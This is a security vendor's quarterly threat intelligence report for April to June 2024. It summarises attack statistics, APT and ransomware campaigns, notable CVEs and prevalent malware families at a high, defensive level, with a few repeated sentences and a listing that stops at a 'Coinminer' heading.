Global Threat Intelligence Report

September 2024 Edition

Reporting Period: April 1 – June 30, 2024

Actionable Intelligence That Matters

This report provides a comprehensive review of the global threat landscape with a focus on providing actionable intelligence that customers can use to proactively secure their organizations. This report covers the time period from April through June 2024. Report highlights include:

Unique malware and attacks stopped (attempted attacks blocked by BlackBerry® cybersecurity solutions) are up 53% and 18% respectively from the prior reporting period. BlackBerry noted an average of over 11,500 unique malware hashes being caught daily.

Read Quarterly Attacks for more information.

This quarter, over 800,000 attacks occurred against critical infrastructure, with 50% of them being targeted against the financial sector.

Uncover our Cyber Threat Intelligence (CTI) team’s internal and external findings in the Critical Infrastructure section.

Commercial enterprises were heavily targeted this cycle, and of these attacks stopped, 66% were against companies that supply capital goods.

Read more about these threats in the section on Commercial Enterprise.

The new Law Enforcement Limelight section brings a fresh aspect to these reports, with findings from the Canadian National Cybercrime Coordination Centre (NC3).

Read more on the ransomware epidemic targeting Canada.

 

Many high-profile crime groups (namely ransomware groups) were highly active this reporting period. These groups use a range of complex tools to achieve their goals.

Read more under Threat Actors and Tooling.

The cyberthreat landscape is a maelstrom of groups exploiting the latest vulnerabilities and utilizing new or updated malware families.

Read our Prevalent Threats section to learn about trending threats across all major operating systems.

Malicious information stealers (aka infostealers) are a prominent weapon utilized by threat actors for exfiltrating valuable information and credentials.

Read our observations on exfiltration tooling in the CylanceMDR Observations section.

Our geopolitical analysis considers how the rise in sophisticated cyber threats underscores the need for enhanced cybersecurity education.

See how BlackBerry is investing in cyber education at its first Cybersecurity Center of Excellence (CCoE) in Malaysia.

Table of Contents

The BlackBerry® Global Threat Intelligence Report is published on a recurring basis to keep CISOs and other key decision-makers informed about the latest cybersecurity threats and challenges affecting their industries and geographic regions. In 2024, we’ve seen geopolitical unrest around the globe on a variety of polarizing issues. This has galvanized malicious actors and opportunistic cyberthreat groups who leverage human turmoil for profit, to cause harm, or to just add to the chaos. To combat these threats, BlackBerry provides essential cybersecurity services for organizations of all sizes and in a wide range of industries across the globe.

Total Cyberattacks This Period

From April to June 2024, BlackBerry cybersecurity solutions stopped 3.7 million cyberattacks. That’s over 43,500 cyberattacks stopped per day — an increase of 18% over our previous reporting period that ran from January to March 2024.

Additionally, we observed an average of 11,500 unique malware samples per day targeting our customer base, up 53% from the last report. This is one of the highest percentage increases, quarter-over-quarter, since we began our Global Threat Intelligence reports. While altering a binary hash or generating unique payloads isn't complex for seasoned threat actors, the unusually high volume of “Attacks Stopped” and “Unique Hashes” is significant. It indicates that malware developers are quickly updating and adapting their code to increase resilience. Raw figures suggest new malware is adapting, existing malware families are gaining capabilities, and adversaries are rapidly employing more advanced tactics. This results in more potent malware through enhanced obfuscation, sophistication and evasion techniques.

BlackBerry is actively monitoring and identifying modifications in malware families as cybercriminal developers make efforts to bypass cybersecurity systems. In this report, you will read the latest findings from our Threat Research and Intelligence Team, learn what groups are currently using each type of malware, and review our recommendations on strategic cyber defense against these types of threats.

As you will notice, the number of total attacks does not necessarily correlate with the number of unique hashes (new malware). As figures 2 through 9 in the next few sections illustrate, not every cyberattack uses unique malware. It depends on the attacker’s motivation, the complexity of the attack and their overarching goal — e.g., espionage, financial gain or causing general harm to the target.

Figure 1: Unique malware hashes encountered per minute, March 2023 to June 2024.
(*This report covers a 120-day cycle. The other reports are roughly 90-day cycles.)

Total Cyberattacks by Country

Attacks Stopped

Organizations utilizing BlackBerry solutions in the United States received the greatest number of attempted attacks this cycle. Outside of the U.S., South Korea, Japan, Australia and New Zealand also experienced a high level of attacks, earning them spots in our top five and making Asia-Pacific (APAC) the second most heavily targeted region.

In the APAC region, where BlackBerry's engagement is increasing, geopolitical tensions continue to influence cyber trends. State-sponsored and non-state sponsored cyberattacks on critical infrastructure, supply chains and businesses are on the rise. Organizations are increasingly targeted by a plethora of threats such as cyber espionage, eavesdropping, ransomware and phishing attacks. To enhance the resilience of their supply chains and organizations, they should exercise caution and heighten their vigilance to protect their infrastructure, data, devices and communications.

Figure 2 shows the top five nations in which BlackBerry cybersecurity solutions stopped the most cyberattacks, and which received the majority of malicious binaries.

Figure 2: Nations ranked by the most attacks stopped and the number of unique hashes, from April to June 2024.

Unique Malware

As noted in the Total Cyberattacks This Period section, BlackBerry observed an average of 11,500 novel hashes (unique malware) per day targeting our customer base, up 53% from the previous report. This is one of the highest percentage quarter-over-quarter increases we’ve observed since we began our recurring reports. Many factors contribute to this rise in unique malware. One is an increase in targeted attacks on a macro level — such as targeting an entire employee email list with targeted phishing emails and company specific lures — with the hope that multiple employees will be deceived.

As Figure 2 shows, the U.S., Japan, South Korea and Australia are still at the top of the list, as they were in the prior period’s report. Additionally, Canada is now the fifth largest recipient of unique malware.As Figure 2 shows, the U.S., Japan, South Korea and Australia are still at the top of the list, as they were in the prior period’s report. Additionally, Canada is now the fifth largest recipient of unique malware.

Results Comparison

As we see in the comparison of this period’s results versus the last report, the top four nations for both attacks stopped and unique malware hashes encountered has remained relatively unchanged. However, Japan superseded its APAC neighbors for the number of malicious hashes our customers in the nation encountered. New Zealand tenants experienced the fifth greatest volume of attacks, and Canada overtook Brazil to make it into our list of the top five countries targeted with unique hashes.As Figure 2 shows, the U.S., Japan, South Korea and Australia are still at the top of the list, as they were in the prior period’s report. Additionally, Canada is now the fifth largest recipient of unique malware.As Figure 2 shows, the U.S., Japan, South Korea and Australia are still at the top of the list, as they were in the prior period’s report. Additionally, Canada is now the fifth largest recipient of unique malware.
Figure 3: Change in ranking of total attacks stopped and unique hashes, in this report (April – June 2024) compared to the previous report (January – March 2024).

Cyber Story Highlight: Espionage in APAC

Transparent Tribe Targets Indian Government, Defense and Aerospace Sectors Leveraging Cross-Platform Programming Languages

In their latest efforts, BlackBerry researchers identified Transparent Tribe, a Pakistani advanced persistent threat (APT) group, targeting India’s government, defense and aerospace sectors. Known for conducting cyber espionage since 2013, the group uses cross-platform languages like Python and Golang, and abuses web services such as Telegram and Discord. Recent campaigns included spearphishing emails aimed at key aerospace stakeholders in Bengaluru (formerly Bangalore), India. Despite attempts to hide their origins, Transparent Tribe’s tactics and tools pointed back to them. 

Cyberattacks by Industry

BlackBerry has consolidated its industry sectors into two major categories: critical infrastructure and commercial enterprises. BlackBerry’s critical infrastructure telemetry and statistics come from its customers in the 16 sectors defined by the Cybersecurity and Infrastructure Security Agency (CISA) as critical infrastructure. These sectors include healthcare, government, energy, agriculture, finance and defense. Business entities within commercial enterprises engage in the production, distribution or sale of goods and services. These enterprises operate in various sectors such as manufacturing, retail and services.

Figure 4: Industry-specific attacks stopped and unique hashes from April to June 2024.

Critical Infrastructure

Critical infrastructure is a lucrative target for cybercriminals. This data is often highly valuable and can be resold to other threat groups, used for planning attacks, or even for espionage. Threat actors targeting critical infrastructure may resort to using ransomware in their attacks because the organization may prefer to pay the ransom rather than take time trying to restore from backups. Time is of the essence for organizations providing critical services such as healthcare, and threat actors know this full well.

This year, geopolitical turbulence has placed critical infrastructure in the crosshairs of adversaries opposed to the policies of the nations they reside in or collaborate with. This frequently galvanizes threat groups and state sponsors to specifically target critical infrastructure.

The increasing digitization of critical infrastructure has made the sector even more vulnerable to cybercriminals in recent years. Threat actors actively exploit critical systems by attacking vulnerabilities such as system misconfigurations and unpatched legacy systems or attempting to infiltrate systems via social engineering campaigns conducted against employees.

In the time period from April to June 2024, CylanceENDPOINT™ and other BlackBerry cybersecurity solutions stopped over 800,000 attacks against organizations in the critical infrastructure industry sectors. Almost half of these attacks were against financial sector businesses — a 10% increase over last period — while government and public sector organizations experienced the greatest diversity of attacks, attracting over 45% of unique hashes.

In addition, nearly one half (49%) of unique malware hashes targeted critical infrastructure organizations, up 17% over the prior period, while 41% of the industry-specific cyberattacks encountered by BlackBerry cybersecurity solutions were against critical infrastructure.

Figure 5: Critical infrastructure attacks stopped and unique malware by sector, April to June 2024.
Figure 6: Most noted internal threats across critical infrastructure this quarter.

Cyber Story Highlight: Threats Against Critical Infrastructure

SideWinder Utilizes New Distribution Infrastructure to Target Ports and Maritime Facilities in the Mediterranean Sea

In July 2024, the BlackBerry Threat Research and Intelligence Team discovered a new campaign by the threat group known as SideWinder. Also known as Razor Tiger, Rattlesnake and T-APT-04, the SideWinder group has been active since at least 2012. The group has previously been observed targeting military, government and business entities, with a particular focus on Pakistan, Afghanistan, China and Nepal. SideWinder typically uses email spearphishing, document exploitation and DLL side-loading techniques to avoid detection and deliver targeted implants.

In this campaign, BlackBerry observed three falsified “visual bait” documents associated with very specific port infrastructure. Visual decoys are typically not in themselves malicious; their primary purpose is to distract the victim from realizing they are being compromised. The victim is usually an employee at a target company. Below is an example from SideWinder’s latest campaign:

Figure 7: Visual bait document used by SideWinder in its latest campaign.
Figure 7: Visual bait document used by SideWinder in its latest campaign.

Threat actors use a variety of tricks to tempt the victim to open and read the visual bait document:

  • The attacker copies the real logo of a legitimate organization which the recipient is likely to be familiar with due to their job or industry. In Figure 7 above, the visual bait document abuses the logo of the (legitimate) Red Sea Ports Authority in Egypt.
  • Document headings are designed to cause maximum anxiety in the recipient. The heading in our example above (“EMPLOYEE TERMINATION AND SALARY CUT NOTICE”) is intended to make the employee fear for the safety of their job and finances.
  • In the sample above, note emotionally loaded phrases such as “depleted most of our financial reserves,” “serious concern” and “terminate employment” in the body copy of the document. These phrases are formatted in bold so they will immediately stand out to the reader.

Threat actors hope that by using familiar company logos and eliciting strong emotions such as fear or concern for job security, the victim will believe the document is legitimate and be compelled to read it in a state of high anxiety. They will then be so distracted that they won’t notice strange events on their device such as system popups or increased fan noise caused by high CPU utilization, which is often an early warning sign of a malware infection in progress.

By analyzing the data uncovered during our research, we concluded with medium confidence that SideWinder’s new campaign is targeting ports and maritime facilities in the Indian Ocean and Mediterranean Sea. Based on SideWinder’s prior campaigns, we believe that the goal of this new campaign is espionage and intelligence gathering. Read the full story in the BlackBerry Blog.

Critical Infrastructure: External Threats

BlackBerry also closely tracks external threats, or threats reported by outside organizations and not necessarily found in BlackBerry’s own tenants. Throughout this period, external groups — government agencies, industry news organizations and others — reported numerous attacks across the globe against critical infrastructure.

In the last few days of March, the news broke that various Indian government agencies and energy sector entities were infected with a customized variant of the freely available infostealer, HackBrowserData. Utilizing phishing emails as the infection vector and Slack channels as an exfiltration channel, the unknown threat actor stole 8.8 GB of sensitive data, including employee details and financial records.

In April, Frontier Communications, a telecommunications company based in Texas, reported to the U.S. Securities and Exchange Commission (SEC) that it had detected a breach on April 14 and had to shut down some of its systems to recover. The unknown threat actor was able to access sensitive data, including personally identifiable information.

Also in April, the Ukrainian Computer Emergency Response Team (CERT-UA) reported a plan by the allegedly Russian-sponsored group Sandworm to attack various critical infrastructure entities within the war-torn country. The plot targeted some 20 entities across various critical infrastructure sectors including water and energy. Sandworm’s long history of attacks on Ukraine’s critical infrastructure is likely to persist as the war between Russia and Ukraine continues.

The first week in May brought a joint advisory from multiple U.S. agencies in collaboration with the United Kingdom’s National Cyber Security Centre and Canada’s Centre for Cyber Security (CCCS) regarding an ongoing hacktivist threat from pro-Russian elements. The hacktivists targeted Internet-connected critical infrastructure, including water, energy, dams and agriculture. Their efforts focused on Internet-facing operational technology (OT) systems in critical infrastructure sectors across Europe and North America.

In early May, BlackBasta ransomware operators targeted a large non-profit Catholic healthcare provider with about 140 hospitals in 18 states across the U.S. The attack disrupted services across the healthcare provider’s network for several weeks. Then, in early June, BlackBasta stole 550 GB of data from the Maryland-based biotechnology firm Elutia. The data included employee and financial information.

BlackBasta wasn’t the only ransomware gang targeting healthcare. In late June, the BlackSuit ransomware group breached South Africa’s National Health Laboratory Service (NHLS) and its 265 labs. BlackSuit is thought to be a derivative of the aggressive and dangerous Conti ransomware gang. The BlackSuit breach coincided with a monkeypox (mpox) outbreak and significantly impacted the NHLS systems. The threat actor deleted portions of the NHLS systems, including backups, though no sensitive patient data was reported lost.

These attacks and others throughout the last quarter indicate that ransomware operators targeting critical infrastructure, particularly the healthcare sector, remain a persistent issue.

Commercial Enterprise

Internal threats against commercial enterprises also increased significantly during this reporting period. The number of attacks stopped by BlackBerry cybersecurity (1.1 million attacks) rose by 60% compared to the last report.

Within the commercial enterprise sector, we observed a significant increase in attacks against the capital goods sector. Unlike consumer goods, capital goods include machinery, tools and equipment essential for various industries throughout commercial enterprise and critical infrastructure. Targeting these assets can impact a business’s digital and physical supply chains.

Figure 8: Attacks stopped and unique malware related to commercial enterprise by sector from April to June 2024.
Figure 9: Top internal threats against commercial enterprise from April to June 2024.

Commercial Enterprise: External Threats

In early April, IxMetro PowerHost suffered a cyberattack by the relatively new SEXi ransomware gang, allegedly using leaked LockBit 3.0 source code. The group targeted the organization’s VMware ESXi servers and backups, causing significant disruption to IxMetro PowerHost’s services in Chile.

Also in April, the Chinese shopping platform Pandabuy was breached and the data of more than 1.3 million customers was leaked online. Pandabuy enables users to purchase products from other Chinese e-commerce platforms. A threat actor known as Sanggiero claimed responsibility for the attack, stating they exploited critical server vulnerabilities within the platform’s API and other exploits to gain access to the retailer’s internal services. The e-commerce retailer was suspected to have initially paid a demand to prevent data leakage. However, in June 2024, the same threat actor claimed to have exploited and extorted the Chinese-based platform again.

In early May, a major multinational technology company alerted customers to a large-scale data breach affecting nearly 50 million individuals. While the technology company confirmed that no financial information was compromised, other personally identifiable information (PII) was exposed, including customer names and physical addresses. Despite this, the technology company has publicly downplayed the potential impact of the breach due to the non-financial nature of the stolen data.

One of the largest data breaches this year so far occurred in May when the threat group ShinyHunters breached a multinational entertainment ticket sales and distribution company and stole the data from over 560 million customers. The data included PII like names, addresses and emails, as well as hashed credit card details. Affected users have since been notified by mail.

In June, an American multinational software company suffered a large outage due to a ransomware attack, impacting operations at thousands of North American car dealerships. The disruption affected all facets of the dealers’ activities, including car sales and repairs, across more than 15,000 locations. The ransomware group BlackSuit claimed responsibility for the attack, demanding nearly U.S. $25 million in cryptocurrency as ransom. It is alleged that the organization paid the ransom to restore its systems.

In late June, TeamViewer, the North American-based software services company, confirmed that prolific APT group Cozy Bear (aka APT29) attacked their corporate IT systems. Cozy Bear is a Russian-based hacking group allegedly affiliated with Russia’s Foreign Intelligence Service. The group committed multiple attacks and exploits over the years, including the 2020 SolarWinds breach. TeamViewer released a statement claiming that only employee account data was compromised, and that they found no evidence that Cozy Bear accessed production environments or customer data.

Cyber Story Highlight: Deepfakes Against Commercial Enterprises

Employee Vigilance: The First Line of Defense Against Deepfake Scams

Deepfake photos, videos and “deep-voice” audio are becoming an increasing problem in cybersecurity. Deepfakes are digitally manipulated media created using generative artificial intelligence (AI), with the most common use-case being a “faceswap” — digitally superimposing one person’s face onto another. Deepfake media is often highly realistic and convincing and can be weaponized by bad actors for use in a wide range of attacks, including phishing scams, fake phone calls, and even fake video calls intended to make the recipient think they are receiving a legitimate request from another employee, such as their boss.

Since the first app for creating deepfakes was launched by a Reddit user in late 2017, deepfakes have evolved at a lightning-fast rate to become frighteningly effective in tricking employees into providing attackers with login credentials, financial or customer records, and even wiring millions of dollars of company funds to a scammer.

In a recent incident, car manufacturer Ferrari escaped a costly deepfake scam. An executive received a suspicious call from someone pretending to be the CEO, Benedetto Vigna. The scammer’s accent and tone were almost identical to that of the real CEO’s, but the executive noticed red flags such as the use of an unfamiliar phone number and the purported urgency of the messages.

To verify the caller’s identity, the executive asked a specific question about a book recommendation — a detail only the real CEO would know. When the scammer couldn’t answer, they hung up. The executive’s quick thinking averted a potential disaster and prompted Ferrari to launch an internal investigation to ensure the security of their communications.

This incident highlights the important role employees play in safeguarding their companies from fraud. A critical component of almost all deepfake attacks is social engineering; the threat actor assumes the employee is the weakest link in a company’s security perimeter and uses psychological manipulation techniques to gain their target’s trust. Kudos to employees who remain vigilant and skeptical of unusual requests, especially those involving the transfer of money or sensitive information. Their awareness and quick action can save a company from significant financial loss and reputational damage. 

Companies can improve their security by educating employees on the red flags that indicate a scammer may be behind a “fake” phone/video call, email or text. You can start by celebrating and supporting these unsung heroes who protect your organization from sophisticated threats every day. Share this anecdote with colleagues and coworkers. Remind them that if they suspect something isn’t right, to trust their instincts and find a secondary way to verify the identity of the requester.

To learn more about deepfakes, read our white paper, Deepfakes Unmasked: The Technology and Techniques Behind This Growing Threat.

Geopolitical Analysis and Comments

Governments around the world are increasingly clear-eyed about the fact that technology is a driving force in geopolitical rivalry. In his address at the RSA Conference in San Francisco, California on May 6, 2024, U.S. Secretary of State, Antony J. Blinken described a world on the doorstep of a zero-sum competition in which countries would be forced to adopt Western or Chinese technology stacks. Secretary Blinken’s ambassador for cyberspace and digital policy, Nathaniel C. Fick, was even more pointed when he stated that, “The international order will be defined by whose metaphorical operating system dominates.”

The unprecedented pace at which technologies such as generative AI are moving has led to a wellspring of activity calling for the “responsible” use of advanced digital technologies. While technologies like AI have significant potential to drive economic growth, transform societies and tackle some of the world’s most intractable problems (e.g., climate change, inequality, and disease), they also pose risks that can be high-impact, particularly if those risks manifest in critical infrastructure or services that people depend on every day.

As underscored in this report, cybercriminals — including state-sponsored groups — have increasingly targeted critical infrastructure. Incidents of malicious or criminal intent to disrupt services or hold critical infrastructure operators and owners ransom have skyrocketed globally over the past several years. This reporting period, BlackBerry documented more than 800,000 attacks against critical infrastructure, with 50% targeted against the financial sector. Perpetrators are aware of the criticality of these services and seek to maximize their efforts to extract ransom by seeking to cause, or threatening to cause, maximum disruption to those services.

Major international sporting events, such as the Olympics and FIFA World Cup, have also become the focus of cyberthreats. In anticipation of a dramatic upswing in malicious cyber activity, Canada’s Centre for Cyber Security released a cyberthreat bulletin in May 2024, assessing that “cybercriminals will very likely target large organizations associated with major international sporting events and local businesses around major sporting events through business email compromise and ransomware attacks.” It also warned attendees and spectators to be on the lookout for phishing emails and malicious websites using these events as lures for attacks.

Indeed, after the Olympic games were over, French authorities reported more than 140 cyberattacks linked to the 2024 Olympics, with all being characterized as “low impact.” However, given trends during previous Olympics, this number is likely a vast underestimation. For example, during the Tokyo Olympics held in 2021, organizers reported 450 million cyberattacks.

As the World Economic Forum (WEF) noted in its Global Cybersecurity Outlook 2024, governments and businesses struggle to maintain cyber resilience against rapidly escalating and increasingly sophisticated cyberthreats that could cause massive disruption. Moreover, there is a great divergence in the ability of organizations to protect themselves. Per the WEF, while 85% of organizations with 100,000 or more employees have cyber insurance, less than 21% of organizations with fewer than 250 employees carry cyber insurance. All in all, the smallest organizations are more than “twice as likely as the largest to say they lack the cyber resilience they need to meet their minimum critical operational requirements.” This imbalance between large and small organizations needs to be addressed.

Law Enforcement Limelight

Beginning with this Global Threat Intelligence Report, BlackBerry is collaborating with the Royal Canadian Mounted Police’s National Cybercrime Coordination Centre (NC3) to highlight key insights from law enforcement on cybercrime trends. This is just one example of how BlackBerry is collaborating with law enforcement agencies around the world to improve public-private collaboration on cybersecurity.
Law Enforcement Limelight
Cybercrime is recognized as a top threat globally and presents unique challenges for law enforcement. Unlike crimes committed in the physical world, cybercrime is often borderless, with perpetrators, victims and infrastructure commonly falling in different jurisdictions, including internationally. In the absence of a global police force, it is necessary for law enforcement worldwide to develop processes for coordinating responses to cybercrime and to engage in international collaboration.

Enhancing Law Enforcement Capabilities: NC3’s Specialized Support

The National Cybercrime Coordination Centre (NC3) was founded in 2020 in response to Canada’s 2018 National Cyber Security Strategy. Under the stewardship of the Royal Canadian Mounted Police,  this national police service is mandated to help reduce the threat, impact and victimization caused by cybercrime in Canada. It provides specialized support to all Canadian police services and employs both police and civilian staff with diverse skill sets to provide the investigative and technical expertise required to effectively analyze sophisticated crimes. The NC3 provides specialized services to support law enforcement partners, such as:

  • Cybercrime intelligence
  • Technical advice and guidance
  • Tool development
  • Behavioral analysis
  • Cryptocurrency tracing

The NC3 works closely with domestic and international law enforcement, government partners, private industry and academia to continuously improve the Canadian law enforcement response to cybercrime.

The Prevalence of Ransomware

With access to cybercrime data at the national level, the NC3 regularly assesses emerging cybercrime trends to inform investigative priorities and to better understand the cybercrime ecosystem. The NC3 uses open-source reporting to augment the picture. Ransomware has been assessed as the top cybercrime threat in Canada, as almost 60% of incidents reported to the NC3 are ransomware attacks. No organization is immune, as ransomware operators target all sectors and organizations, although small and medium-sized businesses (SMBs) are a particularly attractive target in Canada.

Top Ransomware Threats in Canada

The NC3 conducts regular assessments to identify the top ransomware threats in Canada. The most recent assessment covered incidents from January 1, 2024 through April 30, 2024. The figure below provides the top ten ransomware threats for this period.

Despite the prevalence of ransomware, most cybercrime is unreported. It is estimated that only about 10% of cybercrime is reported to Canadian law enforcement. This underreporting makes it challenging to fully understand the prevalence and impact of cybercrime in this country.

Figure 10: Top ransomware findings of NC3 affecting Canada, January to April 2024.

An Underreported Crime

Addressing the widespread issue of underreported cybercrime is crucial for gaining a comprehensive understanding of its true scope and impact. Accurate reporting not only enhances the ability of law enforcement agencies like the NC3 to respond effectively but also strengthens the foundation for strategic countermeasures. By fostering increased collaboration between public and private sectors, we can bridge the gap in reporting and build a more resilient defense against the ever-evolving threat of cybercrime
Figure 3: Change in ranking of total attacks stopped and unique hashes, in this report (April – June 2024) compared to the previous report (January – March 2024).

Cyber Story Highlight: Ransomware Hits the Skies

Akira Ransomware Targets the LATAM Airline Industry

In June 2024, BlackBerry researchers investigated an attack by Storm-1567 using Akira ransomware against a Latin American airline. This financially driven gang, known for double extortion tactics, initially accessed the network via SSH and exfiltrated crucial data before deploying Akira. Notable for exploiting outdated systems and abusing legitimate software, Storm-1567 targets SMBs globally, targeting over 250 organizations and amassing over $42 million in ransom as of January 2024.

Incident Response Analysis and Comments

The BlackBerry Incident Response (IR) Team regularly monitors incidents in which the initial infection vector is an Internet-connected device. Cyberattacks on vulnerable devices — such as misconfigured devices or those with factory set passwords — are common. Overworked corporate security teams often fail to adequately secure all of their Internet devices (network printers and laptop web cameras, for example). In addition, increasingly critical functions are now being baked into devices, such as network and firewall appliances.

This quarter, the IR team found vulnerabilities in outdated versions of Cisco Adaptive Security Appliances (ASA) and devices with Palo Alto Networks PAN-OS software. Unprotected or poorly configured Internet devices can allow cyber thieves to deploy ransomware into the company’s environment and exfiltrate its data. This highlights the need for companies to apply security updates to all Internet-exposed systems and to do so in a timely manner. (MITRE – External Remote Services)

The team observed several incidents where the unauthorized actor was able to access company cloud resources. The two recent situations detailed below underscore the importance of regular system updates and robust network security measures.

  • Incident 1: During a cybersecurity breach, threat actors exploited a series of vulnerabilities on an outdated Cisco ASA to gain unauthorized access to the company’s virtual private network (VPN). Once inside the network, they utilized the Microsoft Remote Desktop Protocol (RDP) to infiltrate the domain controller, allowing them to obtain a comprehensive list of users and groups within the domain. Leveraging tools such as netscan and Advanced IP Scanner software, the threat actors conducted a thorough network scan to map out the infrastructure. Subsequently, the attackers exfiltrated the entire "C:\Users" folder that contained critical user data and then deployed Akira ransomware, causing significant disruption and data loss.
  • Incident 2: A client received alarming security alerts from their domain controllers, signaling unauthorized access. Investigation revealed that the threat actors had exploited vulnerabilities in an outdated, end-of-life Cisco ASA appliance to infiltrate the network. Once inside, the attacker deployed BlackSuit ransomware, causing significant disruption to the client's operations.

These incidents highlight the need for companies to implement strong authentication security controls on all systems. (MITRE – Valid Accounts: Cloud Accounts)

Figure 11: Top incident response scenarios, April to June 2024.

Cyber Story Highlight: Massive Data Breach Exposes 2.9 Billion Records

Four Terabytes of Highly Personal Data Stolen from Citizens of the U.S., the UK and Canada.

In April, a sales thread was posted on the notorious underground cybercrime site BreachForums related to a suspected leak of the personal records of “the entire population of the USA, CA and UK.” The post claimed that four terabytes of data had been stolen, consisting of highly sensitive PII like full names, mailing addresses, phone numbers and even Social Security numbers (SSNs) of American citizens, as well as people in the United Kingdom and Canada.

The threat actor known as USDoD claimed to have stolen over 2.9 billion rows of records and demanded a substantial fee of U.S. $3.5 million for the leaked information in this large dataset.

This ransom demand ultimately proved unsuccessful, and in July, 4 terabytes of data were released for free via BreachForums. It consisted of over 137 million email addresses, 272 million SSNs, and more. The cause of the leak is believed to be related to RecordsCheck.net, a subsidiary site of the data broker and background check service National Public Data (NPD), which inadvertently published the passwords to its back-end database in a plaintext file that was freely available from its homepage — a critical security oversight that was eventually discovered and exploited by the threat actor.

In a formal statement, NPD acknowledged an attempt in late 2023 to access their records; however, they didn’t mention the extent of the records that might have been affected.

Though only recently leaked, the data itself spans decades, meaning that a percentage of victims affected by this leak may be potentially already deceased, and some data in the leak is likely out of date. It’s also important to note that one person can have many different records, each related to previous addresses and names associated with that person. This means that the number of people impacted by this leak will likely be far less than the previous erroneous media claim that 3 billion people may have been affected.

However, given the sheer volume of PII data, it has become one of the largest recorded data leaks ever in the United States, and should be cause for concern of all U.S.-based victims. It is highly likely that this stolen data will be leveraged and weaponized by many other threat actors in the following months as the fallout of this debacle settles. It is therefore important that all citizens actively monitor their credit reports for fraudulent activity and report it to the credit bureaus if detected.

Cyber Story Highlight: Emerging Ransomware Group – Space Bears

In a cyberthreat landscape saturated with ransomware gangs, targeting legitimate organizations remains lucrative for cybercriminals. New groups frequently emerge or spin off from old gangs, often starting operations with a new or improved ransomware strain and modus operandi that typically follows tried and tested methods from past threat actors.

One such group that emerged this reporting period is Space Bears, known for their slick and polished leak site. Some researchers suggest they may have links with the Phobos RaaS operators.

Figure 12: The Space Bears leak site.
Figure 12: The Space Bears leak site. (Source: https://socradar.io/dark-web-profile-spacebears/)

Who Are the Space Bears?

Like most ransomware gangs today, Space Bears employ a double extortion method. Upon gaining entry to a victim’s network, they first exfiltrate and then encrypt sensitive data, putting pressure on the victim to pay a ransom. Space Bears may threaten to publicly post the data on the Internet if the ransom isn’t paid.

References to the stolen data are posted on their leak site, located at an “.onion” address on the deep web. The Tor Project, commonly called “The Onion Router,” is an open-source privacy tool that keeps the user’s online activity anonymous and secure. The victim is named and shamed on this leak site, with a countdown timer displayed until the release of the data, should they not pay the ransom within the specified time limit. Since becoming active in mid-April, this group has already targeted over 20 victims across various global industries.

Figure 13: Space Bears leak site victim page.
Figure 13: Space Bears leak site victim page.

Space Bears Target Industries and Geolocations

Space Bears’ victims span a wide variety of disparate industries across the globe. The broad range of targeted industries and global locations may be intentional. For instance, the group may be trying to stay under the radar of law enforcement and make it harder for defenders to find them. For this reason, international cooperation is usually necessary to investigate these crimes and shut down the threat group. Because the threat actor’s activity is so widespread across global locations, it takes time for governments and law enforcement agencies to respond and share information. That, unfortunately, provides ransomware groups with more opportunities to plan, evade and regroup.
Figure 14: Industries targeted by the Space Bears threat group.
Figure 15: Locations of Space Bears victims to date.

Common Vulnerabilities and Exposures

Notable Common Vulnerabilities and Exposures (CVEs) provide a framework for identifying, standardizing and publicizing known security vulnerabilities and exposures. Almost 12,011 new CVEs were reported by the National Institute of Standards and Technology (NIST) from April through June 2024. This is nearly a 35% increase in disclosed vulnerabilities over a similar time period in January to March 2024.

May holds the record so far this year for the most newly discovered CVEs, with close to 5,103 new CVEs, breaking all noted figures from the first quarter of the year. These include:
 

Palo Alto PAN-OS RCE

CVE-2024-3400 (10.0 Critical) Arbitrary Code Execution
According to Palo Alto, this issue is applicable to PAN-OS 10.2, PAN-OS 11.0 and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portals. The CVE relates to command injection as a result of an arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software. This vulnerability could potentially enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Given this potential, the CVE was given the highest critical score.
 

PyTorch Framework Vulnerably RCE

CVE-2024-5480 (10.0 Critical) Arbitrary Code Execution
A vulnerability in the PyTorch’s ‘torch.distributed.rpc’ framework, specifically in versions prior to 2.2.2, allows for remote code execution (RCE). This vulnerability permits attackers to execute arbitrary commands by leveraging built-in Python functions.
 

Quantum Gateway Information Disclosure

CVE-2024-24919 (8.6 High) Authentication Bypass
Perimeter network devices like VPNs are prime targets for both hackers and advanced state sponsors. Check Point™ published a zero-day advisory on May 28, 2024, warning customers that a vulnerability in its Security Gateways can allow attackers to access sensitive information and gain domain privileges. This vulnerability enables hackers to move laterally and gain further network privileges. In a statement, Check Point noted there had been a number of unauthorized access attempts, with thousands of potential devices affected by the flaw.

Figure 16: CVE scoring, April to June 2024.

Prevalent Threats by Platform: Windows

Infostealer

Lumma Stealer is a C-based infostealer that focuses on exfiltrating private and sensitive data from the victim’s device, including cryptocurrency wallet data and two-factor authentication (2FA) browser extension data.

Downloader

GuLoader (aka CloudEyE) is encrypted shellcode wrapped in Visual Basic 5 or 6 to download additional payloads of various types.

Infostealer

Agent Tesla is a .NET based trojan that is often seen sold as MaaS and is used primarily for credential harvesting.

Infostealer

RisePro uses a number of distribution methods to gain access to victims’ devices and collect sensitive data to send back to a C2 server.

Infostealer

RedLine Stealer uses a wide range of applications and services to collect victim information such as passwords, cookies and credit card information.

Remote Access Trojan

Remcos, short for remote control and surveillance, is an application used to remotely access a victim’s device.

Remote Access Trojan

DCRat is a remote access trojan that steals victim information and executes commands from a C2 server. DCRat has been observed being distributed via Signal.

Botnet

Amadey is a botnet that collects victim information and waits for commands from a C2 server to download additional payloads.

Prevalent Threats by Platform: Linux

Trojan

The trojan XorDDos maintains its prevalence in our telemetry this reporting period. Using XOR encryption to control access to communication and execution data, XorDDos infects Linux-based devices and controls them as a singular botnet via C2 instructions.

Backdoor

BPFDoor is a Linux backdoor which utilizes a Berkeley Packet Filter (BPF) sniffer to intercept and modify network traffic. BPFDoor has been used as a passive surveillance tool by the threat actor group Red Menshen due to its ability to bypass firewalls and remain undetected. New variants of BPFDoor have adopted reverse shell communication and bolstered encryption.

Botnet

Mirai has been detected utilizing an authentication bypass flaw to gain access to endpoints, along with a command injection vulnerability to deliver and deploy the botnet and take over vulnerable devices.

Botnet

Bashlite, also known as Gafgyt, is another Linux botnet which uses C2 servers to send instructions to be carried out by its infected devices. It has been documented targeting Internet of Things (IoT) devices such as routers, which it uses to coordinate large scale DDoS attacks against targets.

Coinminer

